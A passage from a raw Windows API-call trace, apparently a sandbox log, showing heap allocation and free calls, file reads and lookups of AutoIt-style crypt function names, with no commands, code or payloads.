(HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0038.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0038.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0038.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0038.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0038.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0038.944] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0038.944] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0xec62, lpOverlapped=0x0) returned 1 [0038.946] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0038.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0038.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0038.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xec62) returned 0xac0018 [0038.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0038.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0038.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0038.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0038.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0038.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0038.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xec62) returned 0xacec88 [0038.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0038.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.950] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0038.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0038.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0038.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xec62) returned 0xac0018 [0038.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0038.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0038.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0038.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.951] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0038.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0038.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0038.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0038.951] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0038.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0038.951] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0038.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0038.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da198 [0038.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0038.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0038.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0038.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xec62) returned 0xac0018 [0038.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1b8 [0038.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0038.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0038.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0038.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1f8 [0038.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0038.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0038.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0038.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da148 [0038.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0038.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0038.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0038.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c8c8 [0038.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0038.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0038.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0038.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0038.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0038.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xec62) returned 0x935008 [0038.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0038.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0038.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0038.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0038.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0038.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0038.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0038.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0038.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0038.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0038.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0038.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0038.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0038.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0038.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0038.954] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0038.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0038.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0038.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0038.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0038.954] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0038.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0038.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0038.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0038.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0038.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0038.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0038.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0038.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0038.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0038.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0038.955] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0038.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0038.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0038.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0038.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da358 [0038.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0038.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0038.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0038.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0038.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889970 [0038.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0038.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0038.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0038.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0038.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0038.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0038.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0038.955] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0038.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0038.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0038.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0038.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0038.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0038.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0038.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0038.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0038.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0038.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0038.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0038.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0038.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0038.956] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0038.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0038.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0038.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0038.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0038.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0038.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0038.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0038.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0038.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0038.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0038.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0038.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0038.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0038.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0038.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0038.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0038.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0038.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0038.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0038.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0038.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0038.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0038.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0038.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0038.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.956] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0038.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0038.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0038.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0038.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0038.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0038.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0038.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0038.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0038.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0038.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0038.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0038.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0038.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0038.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0038.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0038.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0038.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0038.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0038.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0038.957] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0038.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0038.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0038.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0038.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0038.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0038.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0038.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0038.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0038.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0038.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0038.958] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0038.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cec8 [0038.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0038.958] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0038.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0038.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0038.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0038.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0038.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0038.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0038.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0038.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0038.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0038.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0038.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0038.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0038.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0038.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0038.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0038.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0038.959] RtlAllocateHeap 